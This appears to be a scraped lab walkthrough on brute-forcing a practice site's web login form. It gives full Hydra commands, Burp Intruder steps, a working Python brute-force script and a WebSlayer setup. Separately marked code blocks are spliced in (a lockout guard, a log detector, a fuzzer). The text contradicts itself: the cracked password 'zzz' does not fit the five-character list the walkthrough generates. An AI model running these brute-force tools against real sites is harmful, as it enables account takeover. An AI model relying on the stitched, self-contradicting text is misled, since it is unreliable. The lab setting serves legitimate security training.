1. web-form brute force methods-libre


8/10/2019 1. Web-Form Brute Force Methods-libre

http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 1/58

All information contained here is for academic research, web application exploitation research, bug hunting research, laboratory test bed use, and educational purposes only. The techniques shown here aren't designed to compromise live machines, web applications or a host. These techniques are laid down on purpose for awareness and research, thereby the authors are not responsible for the actions conducted by individuals in any form. Neither is this document transmissible or re-usable; written permission from the authors is a must, failing which certain legal actions might be provoked.

Web Form Brute Force Methods
Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist
Dated: 6th August, 2014, Springs, 4:00 PM IST


Web Application Exploitation with Shritam Bhowmick  2

These are web application penetration testing challenges hosted at pentesteracademylab.appspot.com; the site offers several challenges for web application security researchers to break in a safe environment. This document is for lab practice only, and no part of it was provided by the original authors of the challenges.


Contents

Hack (page 4)
Method 1: Using Hydra to Brute Force Web Logins (page 8)
Method 2: Using Burp Suite Intruder to Brute Force Web Logins (page 13)
Method 3: Using Python to break Web-Form Login (page 32)
Method 4: Using WebSlayer to Brute Force Web Logins (page 38)
Method 5: Nmap Script Code to break web form (page 48)
Contact Information (page 58)


Challenge: Use Brute-force methods to hack into the login pages.

Target: http://pentesteracademylab.appspot.com/lab/webapp/1  

Topic: Using Crunch and Brute forces on Web Application Web Forms.

Hack

Hack: So, the usernames for the challenge are jack and admin, which were provided to us as a hint. We have to create a file for the users. This could be done on Linux by issuing the following command:

#echo -e "[email protected]\n[email protected]" > users.txt

Note: echo with the -e switch is used to interpret the \n escape, which is required for a line feed. Also, no [space] is appended around it, for the same reason: the escape creates a new line and the next entry starts at the beginning of that line without any spaces involved.

Generating custom password list with 5 minimum and the 5 maximum size with xyz as the character set.

Crunch: we'd use crunch to generate our own custom password list. Passwords could also be fetched in case there were no hints provided; we could later use Hydra to generate a username/password list prior to brute force attacks, but here, to keep things at ease, we've used crunch. Note that for web applications which do not hint you anything, where you'd not expect a minimum or maximum length for the characters, nor know the characters being used for the password in the first place, use fuzzdb. This includes username and password files which were pre-generated by the community for the community of hackers. Use fuzzdb for other injections as well, and use it for dictionary attacks if you wouldn't want a hybrid-based brute force running for long years on a low-end spec system at your disposal.

To generate passwords using crunch with minimum 5 characters and maximum 5 characters, as depicted by the hint for this particular challenge, with the characters themselves restricted to x, y and z, use the following command at the Linux command line, or do bash operations. Anything helps!

#crunch 5 5 xyz > passwords.txt

What we have is a list of users and a list of passwords. Look at the URL and see if the parameters are being passed in the URL; if they are, it's a GET based request. By default, if the page source doesn't describe a method, it's taken as a GET method. To demonstrate this, input any dummy characters in the input fields:


The parameters as well as their values are reflected in the URL, which confirms it's a GET request which is sent by the client to access the resource:

Now, if this is verified from the source after we try to login, we will see there is no method described in the source page, which means again that the default (if not specified by the source) method would be a GET request:


The username hints and the domain given were jack and admin as users and pentesteracademy.com as the domain, so the possible username set would be:

- [email protected]
- [email protected]

Now that we have the valid usernames (before, we used nick and admin to generate the username file as an example, which were invalid), we need to go and brute force the login with this set of usernames and the generated password list taking x, y and z with minimum 5 characters and maximum 5 characters. For this, there are the following methods by which we can accomplish the brute force on web applications:

1.) Use Hydra for Brute Forcing
2.) Use Burp Suite as a web-client proxy for Brute Forcing with Intruder
3.) Use python scripts, designing a python script which goes ahead and brute forces the login
4.) Use WebSlayer with Hydra generated password lists
5.) Use the power of the Nmap Scripting Engine to facilitate web form bruteforces.


Method 1: Using Hydra to Brute Force Web Logins:

About Hydra:

For web-based forms, you have to know much more information about the form you are attacking before you start the attack. Every web-based form is slightly different: different URLs and parameters, and different responses for success or failure.

You need to know:

- The hostname/IP and URL
- Whether it is an HTTPS or HTTP service
- Whether the form supports GET or POST (or both)
- The parameters of the request
- The difference in response between success and failure
- Whether any session cookies are required to be set or maintained
- What lockout features and thresholds are enabled (if any)
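As an added example (not from the original document, and not the lab's own code), the following Python 3 snippet shows the last item in that list from the application's side: a lockout that counts consecutive failures per account, and a replay of the full crunch keyspace from this challenge (3^5 = 243 guesses over x, y and z) against it. The names LoginGuard, verify_login and simulate_attack, the thresholds, the in-memory credential store and the password "xyzzy" are all assumptions made for this demonstration.

```python
# Added example, not from the original document: a minimal login guard that
# enforces the "lockout features and thresholds" item from the list above.
# All names (LoginGuard, verify_login, simulate_attack) and the in-memory
# credential store are hypothetical / constructed for this demonstration.
import hashlib
import hmac
import itertools
import os

PBKDF2_ROUNDS = 50000


def make_record(password, salt=None):
    """Store a salted PBKDF2 hash of the password, never the password itself."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return {"salt": salt, "hash": digest}


def check_record(record, password):
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], PBKDF2_ROUNDS)
    # constant-time comparison so the check itself is not a timing oracle
    return hmac.compare_digest(digest, record["hash"])


class LoginGuard:
    """Counts consecutive failures per account and locks the account for a while."""

    def __init__(self, max_failures=5, lockout_seconds=900):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.failures = {}      # account -> consecutive failed attempts
        self.locked_until = {}  # account -> time (seconds) when the lock expires

    def is_locked(self, account, now):
        return self.locked_until.get(account, 0) > now

    def record_failure(self, account, now):
        if account in self.locked_until and not self.is_locked(account, now):
            # an earlier lock has expired: start a fresh counting window
            del self.locked_until[account]
            self.failures[account] = 0
        n = self.failures.get(account, 0) + 1
        self.failures[account] = n
        if n >= self.max_failures:
            self.locked_until[account] = now + self.lockout_seconds

    def record_success(self, account):
        self.failures.pop(account, None)
        self.locked_until.pop(account, None)


def verify_login(store, guard, email, password, now):
    """Returns 'locked', 'ok' or 'failed'. The lock is checked before any hashing,
    so a locked account costs the server nothing per guess."""
    if guard.is_locked(email, now):
        return "locked"
    record = store.get(email)
    if record is not None and check_record(record, password):
        guard.record_success(email)
        return "ok"
    guard.record_failure(email, now)
    return "failed"


def simulate_attack(store, guard, email, now):
    """Replays the whole crunch keyspace (3^5 = 243 guesses over x, y, z) and reports
    how many guesses the guard actually let through to the password check."""
    counts = {"attempted": 0, "allowed": 0, "blocked": 0, "found": False}
    for guess in itertools.product("xyz", repeat=5):
        counts["attempted"] += 1
        status = verify_login(store, guard, email, "".join(guess), now)
        if status == "locked":
            counts["blocked"] += 1
        else:
            counts["allowed"] += 1
            if status == "ok":
                counts["found"] = True
                break
    return counts


# Constructed credential store for the demonstration; "xyzzy" is a made-up password.
STORE = {"admin@pentesteracademy.com": make_record("xyzzy")}

if __name__ == "__main__":
    guard = LoginGuard(max_failures=5, lockout_seconds=900)
    print(simulate_attack(STORE, guard, "admin@pentesteracademy.com", now=1000.0))
```

With the default of five failures, the guard lets five guesses reach the password check and rejects the remaining 238 without hashing anything, so a keyspace that Hydra or Burp would otherwise exhaust in seconds is never completed. Keying the counter by source address as well as by account would additionally cover attempts spread across many usernames.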

Now for an example consider the form fields described below in the image:

Here consider the following:

1.) Hostname: the hostname would be your target hostname, or an IP. Just that.
2.) URI: the Uniform Resource Locator would be the resource where the form could be located.
3.) Method: the method shown in the image is POST, but in pentesteracademylab.appspot.com/lab/webapp/1, the one we're into, it's GET, so we'd use GET rather than POST there.
4.) Also, the URI (or rather the URL) is cut out from the rest of the host information and kept enclosed in double quotes.


5.) Hydra basically iterates through all the username/password combinations until it gets a response that does not contain the blacklisted text, or that does contain the whitelist string if a whitelist string is provided.
6.) The blacklist string would be the string that comes up if the user is not authenticated; the application throws out a string which hydra can pick up and log. This is the string which, if Hydra does not find it, makes Hydra assume that it's logged in and log the username and the password which were successful in bruting the web-login.
7.) The whitelist is a different scenario: if Hydra has to detect web-login authentication success by a string which proves that the login was valid, hydra will go ahead and, if any such whitelist string is found, log the credentials for that very request sent, i.e. the username and the password for that request (POST or GET).

Not knowing or understanding the above information can be a big cause of failure.

- The host is pentesteracademylab.appspot.com
- It's a GET method, so pick http-form-get, because it's a web form as well.
- The URL, or more specifically the form fields, is situated in /lab/webapp/1 in this case.
- With the form fields set, append the email (the users for authentication) and the passwords with the appropriate user and password lists, and note that this would be done in continuation of the form fields in order to complete the form itself. The form fields declaration in hydra would be enclosed in double quotes: "/lab/webapp/1:email=^USER^&password=^PASS^ We use email and password as our parameters here because the source code has the email and the password as its entries; if it were a different application, this might change!
- Anything in-between ^_____^ specifies that hydra needs a feed into these places, which turns out to be the username file and the password file respectively. Notice that there are more parameters which hydra needs to brute force web login forms, which is the reason the double quotes are not closed yet.
- The parameters are separated by colons (:) and the next step is to let hydra know when the login succeeds. For instance, if a user fails to get authenticated while logging in, Hydra takes a blacklist string like "Failed" or "Authentication Failure" as the string and detects whether these blacklist words do not appear; if they don't, it's a successful login. So we'd have to append that as well along with "/lab/webapp/1:email=^USER^&password=^PASS^", which could be done by appending yet another colon, for example /lab/webapp/1:email=^USER^&password=^PASS^:blacklist string
- So for now, our whole query for hydra would be: hydra pentesteracademylab.appspot.com http-form-get "/lab/webapp/1:email=^USER^&password=^PASS^:Failed"
- Notice that the query now ends with the double quotes in place. We also set the blacklist string to "Failed" because in this web login any failed login attempt generates the string "Failed! Please Try Again!", which could be seen below:
- Alternatively we could also provide whitelist strings in case we know what the successful attempts would look like and the application never throws any strings on unsuccessful logins on web forms. Now, if we are running Hydra from the directory where our generated users and password files are stored, we could provide the users and the passwords list as is, or show the directory path, for login users using the -L switch and the password list using the -P switch, which is: -L users.txt -P passwords.txt

- Next, we would also add threading, because hydra supports parallel brute force power, and 20 is the maximum allowed integer for this with the -t switch.
- At last, we include the -o switch to save the results in a text file called results.txt.

Final Query for Hydra: hydra pentesteracademylab.appspot.com http-form-get "/lab/webapp/1:email=^USER^&password=^PASS^:Failed" -L users.txt -P passwords.txt -t 20 -o results.txt

This will fetch the valid logins and the passwords, if found using the blacklist string, and store the results in a text file called results.txt.

#cat results.txt

And you'll probably find the usernames and passwords. Try them all in case hydra goes wrong. For me, the results look like the following after Hydra went ahead and brute forced the web-login, and hence one of the usernames and the corresponding password worked in the scenario:
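On the defending side, every attempt described above lands in the web server's access log, and because this form submits via GET, the guessed password sits in the query string of each logged request. The following Python 3 snippet (an added example, not part of the original document) parses constructed Apache-style log lines, flags a source that fires a burst of login attempts within a short window, summarizes the response sizes it received (the same Length signal the Burp Intruder method later relies on, seen from the server side), and masks the password parameter before such lines are shipped to a log collector. The log lines, IP addresses, thresholds and function names are all constructed for this example.

```python
# Added example, not from the original document: detection logic for the
# traffic a GET-based login brute force leaves behind in a web server access log.
# Log lines, addresses, thresholds and function names are constructed for the demo.
import itertools
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/lab/webapp/1"   # the challenge's login form (from the document)


def parse_line(line):
    """Split one access-log line into the fields the detector needs, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("ts"), TS_FMT),
        "path": url.path,
        "query": parse_qs(url.query),
        "status": int(m.group("status")),
        "size": 0 if m.group("size") == "-" else int(m.group("size")),
    }


def redact_line(line):
    """GET logins write the submitted password into the log line itself;
    mask it before the log leaves the host."""
    return re.sub(r"\b(password|passwd|pass)=[^&\s\"]*", r"\1=[REDACTED]", line)


def detect_bruteforce(lines, window_seconds=60, threshold=10):
    """Flag every source IP that sends more than `threshold` login attempts inside
    any `window_seconds` window. Status codes are useless here (the lab answers
    200 for success and failure alike), so the summary reports response sizes:
    a cluster of identical sizes with one outlier is the signature of a hit."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"] == LOGIN_PATH and "password" in rec["query"]:
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["time"])
        start, peak = 0, 0
        for end in range(len(recs)):          # sliding window over sorted times
            while (recs[end]["time"] - recs[start]["time"]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            sizes = defaultdict(int)
            for r in recs:
                sizes[r["size"]] += 1
            alerts[ip] = {
                "attempts": len(recs),
                "peak_in_window": peak,
                "accounts": sorted({r["query"].get("email", ["?"])[0] for r in recs}),
                "response_sizes": dict(sizes),
            }
    return alerts


def build_sample_log():
    """Constructed log: one ordinary visitor, then one source submitting 30 guesses
    from the x/y/z keyspace in 20 seconds. Failure pages are 1337 bytes; the one
    guess that 'succeeds' returns a 1422-byte page."""
    lines = ['198.51.100.2 - - [06/Aug/2014:15:59:40 +0530] '
             '"GET /lab/webapp/1 HTTP/1.1" 200 1210 "-" "Mozilla/5.0"']
    guesses = ["".join(g) for g in itertools.product("xyz", repeat=5)][:30]
    for i, guess in enumerate(guesses):
        size = 1422 if guess == "xxzyx" else 1337
        lines.append(
            '203.0.113.7 - - [06/Aug/2014:16:00:%02d +0530] "GET %s?email=admin%%40pentesteracademy.com'
            '&password=%s HTTP/1.1" 200 %d "-" "Mozilla/5.0"' % (i * 20 // 30, LOGIN_PATH, guess, size)
        )
    return lines


if __name__ == "__main__":
    for ip, summary in detect_bruteforce(build_sample_log()).items():
        print(ip, summary)
    print(redact_line(build_sample_log()[1]))
```

The rate check alone would also fire on a misconfigured client; the response-size summary is what separates a noisy failure loop from a loop that ended in one different-looking page. Moving the form to POST keeps the passwords out of the access log but does not change the rate signal, which is why the lockout on the application side and this detection on the log side complement each other.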


That was for Hydra, but as we look here, Hydra is efficient and could get a number of results, and could also go wrong several times without any hints; there are some other ways we could accomplish this same task. We'll use a method which includes using a client side proxy with Intruder attacks, using these same files generated with Crunch at our disposal. Before we begin with Burp, we'll go through some of the basics for Burp which an attacker might need to know beforehand. If you are looking for a detailed discussion on Burp Suite, refer to my other papers, which go deep into using Burp Suite as a Web Application Swiss Knife, or use the compiled book delivered by me, which has a section on Burp Suite and using the tool to make the most of its benefits.


Method 2: Using Burp Suite Intruder to Brute Force Web Logins:

About Burp Suite:

Burp Suite was designed by Portswigger to formulate a client side based web-proxy which assists interception of HTTP requests and responses, along with support for intercepting web-services based traffic such as WSDL. Burp Suite has been written on the Java Platform and provides extensions for various other scripts with the help of the Jython based platform, which includes using Python scripting written for Java. Most interestingly, Burp Suite provides a framework for web security penetration testers to intercept HTTP traffic, debug applications, as well as black-box test web applications with an included tool-set like Repeater, Intruder, Comparer, Decoder, and much more. The scope of this section covers the Intruder; if you are interested in learning Burp Suite in detail, there is a separate book written by me on it, and you could use it to expand your knowledge on this framework, which would be extremely helpful.

To use Burp Suite to the full extent, provided you have good VRAM storage, the following configuration via the command line on Linux would help start Burp Suite, which is included in Kali Linux already. This version is the free edition of Portswigger Burp Suite. For the Professional version, which penetration testers use, you'd require to buy a license. Go through the Portswigger FAQ to know more.

Launching Burp Suite from the Linux Terminal with a known good configuration:

- Locating Burp Suite on Linux if installed:
- Launching the Burp Suite JAR file with a known good configuration allotting 2 GB of VRAM in the Java memory settings on Linux:

- Accepting the Burp Agreement and proceeding further:

- The Intruder Tab is located after the Scanner Tab, which we'd use for brute forcing the web-form; this will make use of the previously generated usernames and the password list via crunch. But before anything else, we'd require to set up the burp listener to listen on the provided HTTP port and forward our HTTP packets through the Burp Suite Proxy. This requires configuration on the browser, because the HTTP packets require to be forwarded to Burp via the browser. For this, go to: Firefox/Iceweasel Preferences > Select Advanced Tab and find the Proxy Setting. When this is done, the next step is to configure the browser to the below specified ports for Burp to intercept traffic:
- After this has been done, anything that you browse via the browser will forward HTTP packets (requests and responses, if responses are set to be intercepted) via the newly configured Burp Proxy. To make sure of this, on Burp Suite, go to the Proxy Tab and make sure Interception is set to On.

- Browse the target site, in this case http://pentesteracademylab.appspot.com/lab/webapp/1, and note that the Proxy Tab now blinks and asks if any modifications are needed before forwarding the requests to the web-server:
- Click on forward and let the request be sent to the web-server; until the request is forwarded, the browser will wait for the response from the web-server. In case Burp is configured to intercept the responses as well, it'd go ahead and intercept the responses before forwarding them to the browser for web-page presentation. Now that everything is ready and the browser has the response, we will use junk values on this target to capture the HTTP request and send it to Intruder when the proxy tab blinks next. For this, enter any junk values in the web-login form fields and hit sign in to start sending the HTTP request:

- Once sign-in is hit, the proxy tab will ask for any modifications if needed; here we'd need to right click the request headers and send it to the Intruder, so we could brute force the form fields:

- The Intruder Tab now blinks, and we'd need to navigate to the Positions section for additional modifications like where our given payloads would land for the customized attack:
- Burp auto-detects the form fields where the usernames and the password might possibly be injected. We can change this to our liking, but the default payload positions set by the special characters in burp (anything enclosed in § and §) are in this case the suitable scenario. We'll check the cluster bomb attack type because we have two fields which we need to attack, the first one being email, where our username payload would fit, and the second being the password, where our generated password file from crunch will fit; the Sniper attack type is for one payload at one field at a time, which is not the case here:

- Remember, we have two payloads, one for usernames and another for passwords. From here, we will go to the Payloads section of the Intruder tab, use Simple List as the Payload Type and use Load from the Payload Options to load our user generated list file:
- Click open and Burp would set the users.txt file for payload 1, which corresponds to the email field. Next, we also had a second payload which needs to be set, the passwords.txt which was generated previously; for this, in Burp, we'd select Payload Set 2 and then choose the appropriate operations which we did for Payload 1, but here our file will be the generated password list via crunch:


All payloads which we went through so far were Simple List, because they are carriage-return separated files which contain usernames for the email field and passwords for the password field, which we previously enumerated looking at the form-fields from the source page.

- When everything is set up, we would require to navigate to the Intruder option from the menu-bar and click on Start Attack, following which Burp Suite would go ahead using its own browser user-agent engine, parsers etc. and brute force the form fields:


As of now, we could see that the Intruder had started and is brute forcing the web-form.

- Next is detecting the successful logins, if any. By default, any credentials you throw at this particular web application will fetch you a 200 OK response, with the Response Code being 200 and the Reason being OK (look at the HTTP RFCs for more details, and at the HTTP document given by me). Now, unsuccessful logins will be given a 200 OK response too, but if we could somehow eliminate 2xx from the column tab, what would be left are the status codes including 3xx, which would be redirect responses, 4xx, which would be client side errors, and 5xx, which would be any server side errors. Beyond that, 2xx are the informational ones here, which in this case need to be eliminated; we check with this approach first. To do this, we hover over the Filter, which currently says Show All, left click and de-select 2xx Responses, and now we'd be left with 3xx, 4xx and 5xx responses only:

Now Intruder shows it's hiding any informational responses and showing us 3xx, 4xx and 5xx responses:

But we haven't made it yet, because we see there were no responses which included any redirection which could hint at a successful login, or anything which might hint at a successful brute force of the provided credentials for this attack.

- What else could be possible scenarios to look for a successful login? This could be the received content-length header. Now, the next tactical concept is: we receive 2xx for all successful logins as well as unsuccessful logins, and nothing is being redirected, which is the reason there were no 3xx status codes on completion of the brute force; but we see that the content-length for all the responses which were sent was the same. This is provided by the Burp Intruder using the Length column on Intruder upon starting the attack:


We de-select the ones we do not need; preferably, personally I'd de-select request, error, status, timeout, comment and anything else except the payloads Burp made using the custom tailored payloads and the Length. Because Length is what we need to focus on, and status isn't the one here, we hence remain only with the payloads and the content-length which came with the response header:


Now, closely looking at it and scrolling down through the numerous requests made by Burp, we get an exceptional Length value which differs from the other identical ones.

- This is where we need to stop and inspect:

The length value is different, and the payloads which were the credentials for email and password were [email protected] and zzz respectively. Upon inspection on the response tab, and looking at the Render tab, the Burp Browser Engine will render, and we can be presented with how it would look if a user submitted those credentials:

- And that meant the challenge was cracked and we could use those credentials to verify that the username as email was [email protected] and the password used for this particular email was zzz (as per the GET request parameter).

Go to Browser preferences, use the no-proxy option so you could normally browse all sites, and press OK for Burp not to intercept; or alternatively, go to the Burp Suite Proxy Tab and click Interception Off to disable interception of any traffic. Another alternative method is using an addon called swap-proxy and other similar addons:

Render the original target page at http://pentesteracademylab.appspot.com/lab/webapp/1 and enter the credentials Burp had cracked using Intruder:


And you'll get the congratulations, which means the credentials were cracked and successfully bruted using the Burp Suite Client Side Proxy using Intruder and custom tailored payloads.

- Alternative to using Crunch: If Crunch is too much pain and making dictionaries automated is the goal, Burp Suite as a framework could be used to make dictionary files automatically using the Intruder tab. Here's how one could go ahead and automate the dictionary generation using x, y and z as characters and password complexity set to minimum 5 and maximum 5 for these characters:

On the payload tab, set payload type to simple list and manually add the usernames, which here as an example would be [email protected] and [email protected]


Click add and continue adding the usernames to your comfort; the next one shall be [email protected]

Notice that the previous usernames were added; now select Payload Set 2 and select Payload Type as Brute forcer:


We'll use the character set xyz in this demonstration because that's the set of password characters being used; make sure in any other scenario you determine this and add the characters likely for that scenario. Once that's been set, set the Min. Length to 5 and the Max. Length to 5, because that's the password complexity for this demonstration. Everything happens in the Payload Options for Brute Force, set for Payload Set 2.


After everything is set up and done, go to the Intruder on the menu-bar discussed before and start the attack; the results would be the same. Check the content-length as discussed before and look for the responses which render the granted access.

The Render would now render the representation of the HTML as a browser engine would, and we can therefore determine that the password was indeed cracked via Burp Intruder. Now, there used to be another alternative method which currently is experimental and doesn't work properly with the newer versions of browsers; it was made for Firefox as a .xpi addon, and this addon was called FireForce, referenced at:

http://www.scrt.ch/en/attack/downloads/fireforce

Documentation for usage of Fireforce as a web-form login bruteforcer could be found here:

http://www.scrt.ch/outils/fireforce/fireforce_en_manual.pdf

An added reference for Fireforce and how it does what it is supposed to be doing could be found here: http://www.securityaegis.com/easy-breezy-beautiful-password-attacking/

The method for this was not included in this document because Fireforce freezes on large operations on newer Firefox web-browsers. As soon as Fireforce releases a stable version for newer versions of Firefox, it'd likely be included in this document. Next, we will look at developing a python script to break the password using python libraries. For python, the first step would be to learn python, because without knowing python libraries and how python works, one wouldn't be able to automate all of this by developing his/her own scripts. To be able to automate certain web application exploitation, penetration testers use python scripts which they develop at the expense of their own free time. This would be shown in the next method, but it is recommended that people learn python to be able to understand the whole of it.


Method 3: Using Python to break Web-Form Login:

About Python:

- Using version 2.7.3:
- Python terminal:

#python

- Exiting the Python terminal command-line test environment: #exit()
- Enough of the basics, it's time to develop a script which calls the python executable from Linux and loads up the script we develop before it could do anything with the script. For this, we use the shebang to make sure that before executing our code script, the Linux environment imports the python executable from /usr/bin, which has a file called python. We'd check what this file is and learn to locate or find where python is by issuing the following commands, but first we create a file called web-form-brute.py using the touch command, so later we can start writing our code there:

The locate command would generate many more results, but for executables we'd use the whereis command to find where python could be, so that later we could use this directory to call the python executable using the shebang before the located file, and then continue writing our code:

- At this point, we have many versions of python installed; the default we'd pick up is the one at /usr/bin/python. Now, to use the shebang, which is represented by #!, we would have to first use a text editor to open the file which we had created:
- We use nano, a GNU based text editor in Linux. Other options on Linux are pico, vim, gedit, leafpad and emacs. There are tons of text editors available. Once loaded, the screen prompts us to write text into the editor screen; here we begin with our shebang to include the python executable:


The code:

#!/usr/bin/python
# Python 2 script (the document targets 2.7.3): urllib.urlopen and the print statement
from urllib import urlopen
import itertools, sys

def gen_passwords(universe, l):
    # use itertools to create a list of all password permutations
    wl = []
    for i in itertools.product(universe, repeat=l):
        wl.append("".join(i))
    return wl

def brute(username):
    root_url = ("http://www.pentesteracademylab.appspot.com/lab/webapp/1?email="
                + username + "@pentesteracademy.com&password=")
    # want to be able to enter a password on the command line and only send that one test
    if len(sys.argv) < 2:
        wl = gen_passwords("xyz", 5)
    else:
        wl = [sys.argv[1]]
    for pw in wl:
        full_url = root_url + pw
        p = urlopen(full_url).read()
        if not "Failed!" in p:  # success: the failure string is absent from the page
            print "Username: ", username, " Password: ", pw
            break
        else:
            print "Password: %s failed" % pw

brute("admin")
brute("jack")


The Python code:

root_url is the whole GET URL, which takes the username from the defined usernames, jack and admin for this demonstration; the function brute does this job. We use itertools as our library to iterate. The function gen_passwords takes care of the loop which generates every string of x, y and z of length 5 (minimum 5 to maximum 5 characters); brute then sends each candidate and treats a response that does not contain the 'Failed!' string as success, printing the username and the password that worked. Before moving further, chmod +x the python code file to make it executable:

Next, use ./web-form-brute.py to execute the code file and run the script:


The script begins the bruteforcing, and until we see the success string printed next to one of the generated passwords (complexity 5 minimum and 5 maximum) we have to keep looking at the results. Once the bruteforce is over and the script has finished, check through the logs generated (for this, one could have redirected the output to something like ./web-form-brute.py > results_brute.txt at the point of execution and then searched the file for the success string); however, we do get the success string here, which is what we need for a successful login:

The password found is the one printed by the script (it appears in this copy as zzz) and the username is admin, which means admin@pentesteracademy.com is the email for the login form. Use it with the password found and we will get a successful login:


One just needs to launch WebSlayer from the terminal, as shown above.

Next, we'd see a screen with different tabs which represent the crafting of different types of payloads and plenty of ways to generate our own custom payloads and brute-force with them:

Capture the request with Live HTTP Headers, which gives an easy way to feed the right headers to this fuzzer. The add-on we'd be using here is Live HTTP Headers, which is available for Firefox; any other tool-set with the same functionality would do, such as Burp, Fiddler, Charles Proxy and many more. If Live HTTP Headers is installed in Firefox (or Iceweasel), bring it up from the menubar: go to Tools and click on Live HTTP Headers.


Make sure that Capture is turned on and refresh the page http://pentesteracademylab.appspot.com/lab/webapp/1 as shown below:

When done, the page is refreshed and all the requests along with their headers went through Live HTTP Headers, which captured them because it was set to Capture. Our next move is to copy these exact headers, as sent by the original browser client, into WebSlayer so that it presents itself to the server exactly as the original browser client would.

This was the very first request which the client made; here we click on Replay to copy or replay the original request again. After clicking on Replay, something like the below pops up:


We do not need any POST data to be sent because the form does not use POST. This is the attack pre-setup; now, before we generate our payloads, we need to set the keyword FUZZ in the headers, parameters or any field where we'd like WebSlayer to brute-force our generated lists of usernames or passwords. In WebSlayer, one needs to know the username to brute-force the password (which is the limitation), but in this case, to demonstrate how an attacker tool-set is used, we already know the username, admin@pentesteracademy.com, and we need to generate a password list of minimum 5 and maximum 5 characters with the help of WebSlayer.

Here, we know that the request we'll be trying to brute-force is a GET request with parameters email and password. We also know that the email parameter takes admin@pentesteracademy.com and that password is the parameter we need to fuzz; so we quickly change the URL in WebSlayer to suit our needs (notice the URL: when we put junk values into the login form using the original browser, the browser generates a GET based URL which reveals the whole query string):

So we feed this URL into WebSlayer's URL field and make some changes; we'll see what changes are required. For now, we just need to copy this GET based request into WebSlayer.

Now that the original GET based request has been fed into WebSlayer's URL tab, we need to make changes to these parameters:

a.) email

b.) password

We know the username to be admin@pentesteracademy.com, and we need to FUZZ the password parameter, so the value of the email parameter stays admin@pentesteracademy.com and the value of the password parameter becomes FUZZ, since that is the parameter we need to brute-force in order to determine the credentials. The URL therefore becomes (note that FUZZ is a keyword: wherever you put the term FUZZ, WebSlayer will treat it as the injection point for its payloads):

http://pentesteracademylab.appspot.com/lab/webapp/1?email=admin@pentesteracademy.com&password=FUZZ

Notice the changes made to the URL so that WebSlayer takes admin@pentesteracademy.com as the username and injects the payloads we generate into the password parameter. The value of the email parameter remains intact.

After this initial set-up, we need to generate a password list; select the Payload Type as Dictionary as shown here:


In this attack, we are using the dictionary password file created earlier because, after a thorough investigation, I found that we cannot use the payload generator option: it fails at generating candidates between a minimum and a maximum length, supporting only fixed-width permutations over the given characters x, y and z. So, once the Dictionary attack type is selected, we could generate the list via crunch; here we'll use the previously generated list. Load the list by clicking on the ... option and selecting the list file. The list file here is named passwords.txt:

After opening the list, passwords.txt, click Start:
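The same brute-force flow in code, as an added example that is not part of the original document or of WebSlayer: it substitutes the FUZZ keyword into the GET URL the way WebSlayer does, generates candidates either crunch-style (every string over a charset between a minimum and a maximum length, the part WebSlayer's own generator could not do) or from a dictionary, and classifies each response. The transport is pluggable; lab_responder is a constructed stand-in for the pentesteracademylab form so that the script runs offline, the 'Failed!' marker is the one the page's python script keys on, and the secret password xyzzy and the dropped-connection case for one candidate are made up for the demonstration.

```python
"""Added example (not from the original document): a minimal WebSlayer-style
fuzzer with a FUZZ placeholder, a crunch-like generator and response triage."""
import itertools
from urllib.parse import urlparse, parse_qs, quote

FUZZ = "FUZZ"


def crunch_like(charset, min_len, max_len):
    """Yield every string over `charset` with min_len <= length <= max_len,
    the min/max generation the document used crunch for."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def expand(template, payload):
    """Replace every FUZZ occurrence with the URL-encoded payload, so that
    characters such as & or # cannot break the query string."""
    return template.replace(FUZZ, quote(payload, safe=""))


# --- constructed stand-in for the target; swap in a real HTTP call to use it ---
_SECRET = {"admin@pentesteracademy.com": "xyzzy"}   # made-up lab password


def lab_responder(url):
    """Return (status, body) the way the lab form would: 'Failed!' on a bad
    guess, a welcome page on success.  A None body models a dropped
    connection, the failure mode that produces false positives."""
    q = parse_qs(urlparse(url).query)
    email = q.get("email", [""])[0]
    password = q.get("password", [""])[0]
    if password == "zzzzz":          # constructed: simulate a timed-out request
        return 0, None
    if _SECRET.get(email) == password:
        return 200, "<html>Welcome back, %s</html>" % email
    return 200, "<html>Failed!</html>"


def classify(status, body, failure_marker="Failed!"):
    """'fail' when the marker is present, 'success' when a real page came back
    without it, 'retry' for empty or non-200 responses so that a timeout is
    never mistaken for a hit."""
    if body is None or status != 200:
        return "retry"
    return "fail" if failure_marker in body else "success"


def fuzz(template, payloads, send=lab_responder, failure_marker="Failed!"):
    """Run every payload through the template; return the confirmed hits and
    the payloads whose response was unusable and must be re-sent."""
    hits, retries = [], []
    for payload in payloads:
        status, body = send(expand(template, payload))
        verdict = classify(status, body, failure_marker)
        if verdict == "success":
            hits.append(payload)
        elif verdict == "retry":
            retries.append(payload)
    return hits, retries


TEMPLATE = ("http://pentesteracademylab.appspot.com/lab/webapp/1"
            "?email=admin%40pentesteracademy.com&password=" + FUZZ)

if __name__ == "__main__":
    found, again = fuzz(TEMPLATE, crunch_like("xyz", 5, 5))
    print("hits:", found, "need retry:", again)
```

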